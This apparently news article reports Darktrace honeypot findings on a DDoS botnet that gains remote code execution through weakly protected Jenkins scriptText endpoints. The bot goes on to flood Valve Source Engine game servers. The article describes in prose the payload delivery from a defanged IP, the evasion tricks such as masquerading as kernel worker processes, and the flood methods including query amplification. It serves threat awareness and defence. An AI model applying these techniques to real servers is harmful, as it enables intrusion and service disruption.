A new DDoS botnet that abuses exposed Jenkins servers to launch powerful attacks against Valve Source Engine game infrastructure, including servers hosting titles like Counter‑Strike and Team Fortress 2.
The campaign shows how a single misconfigured CI server can be turned into a multi‑platform attack node capable of UDP, TCP, and application‑layer floods against online games.
Darktrace identified the activity through “CloudyPots,” its global honeypot network designed to emulate internet‑facing services across clouds and protocols to observe attacker behavior in real time.
Among these decoy services is Jenkins, a popular CI platform that in this case was intentionally deployed with a weak password to invite brute‑force and opportunistic compromise.
On March 18, 2026, a threat actor successfully authenticated to a Jenkins honeypot and attempted to deploy a new DDoS botnet that Darktrace later confirmed was tuned to attack online game servers.
Darktrace analysts observed attackers exploiting a Jenkins honeypot to deploy a new DDoS botnet targeting video game servers.
The activity underlines how even less frequently targeted services like Jenkins can still be swept up in broad botnet‑building campaigns.
Abusing Jenkins scriptText for RCE
The attackers leveraged Jenkins’ scriptText endpoint, which accepts Groovy scripts and executes them on the server, turning a CI feature into a remote code execution backdoor when exposed and weakly protected.
The malicious script was sent as form‑data and URL‑encoded, but analysts decoded it to reveal distinct branches for both Windows and Linux hosts.
On Windows, the script downloaded a payload from 103[.]177.110[.]202 to the Windows Temp directory, renamed it to a benign‑looking executable, removed internet download restrictions, and opened TCP port 5444 for command‑and‑control traffic.
On Linux, it used a Bash one‑liner to fetch a 64‑bit bot binary from the same IP into /tmp and execute it immediately, providing a fast, file‑light infection path.
Open‑source analysis linked 103[.]177.110[.]202 to Vietnamese hosting provider Webico (Tino brand), with multiple malicious associations observed against the address.
Darktrace found that the same IP was reused for initial access, payload delivery, and C2 communications, an unusually consolidated infrastructure design for a modern botnet.
Most malware families separate distribution and C2 infrastructure to avoid losing control of existing bots when noisy infection servers trigger abuse complaints and takedowns.
Here, the actor traded resilience for simplicity, increasing operational risk but reducing the overhead of managing multiple server tiers.
Once running on Linux, the bot sets Jenkins‑related environment variables to “dontKillMe” to bypass Jenkins’ normal timeout behavior for long‑lived tasks.
It then deletes its original binary, renames itself to mimic legitimate kernel worker processes like “ksoftirqd/0” or “kworker,” daemonizes via double fork, redirects I/O to /dev/null, and installs signal handlers to ignore termination attempts.
The malware then connects to its C2 server, reports the system architecture, and enters a command loop to receive instructions.
Supported commands include utility directives such as “PING” (keep‑alive), “!stop” (exit), and “!update” (self‑update from C2), alongside numerous attack commands that all accept an IP, port, and duration.
Game‑focused DDoS attack capabilities
The botnet supports multiple volumetric and application‑layer DDoS techniques, but several advertised modes map to the same underlying functions, suggesting either capability padding or placeholders for future features.
UDP floods are implemented via two functions: one saturates bandwidth with 1,450‑byte random packets, while another maximizes packets‑per‑second using 64‑byte payloads.
A dedicated function dubbed attack_dayz repeatedly sends Valve’s Source Engine Query packets, forcing game servers to generate disproportionately large responses and exhausting resources with relatively low attacker bandwidth.
Additional functions handle TCP push floods and high‑rate HTTP GET requests over non‑blocking, no‑delay sockets, as well as a “special” mode that targets DNS, NTP, and Valve Source Engine ports with crafted payloads.
Darktrace notes that Jenkins is less commonly abused than other exposed services in its honeypot fleet, but this case proves that any misconfigured, internet‑facing CI server can become valuable DDoS infrastructure.
For botnet operators, even “low‑value” hosts are useful, since overall attack power depends more on the number of bots than on their individual criticality.
The focus on game‑specific techniques aligns with broader trends, as gaming continues to rank among the top industries hit by DDoS attacks worldwide.
Operators of Valve Source Engine servers and other online games should harden hosting environments, implement DDoS protections on ports like 27015, and ensure CI tools such as Jenkins are never exposed with weak credentials.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
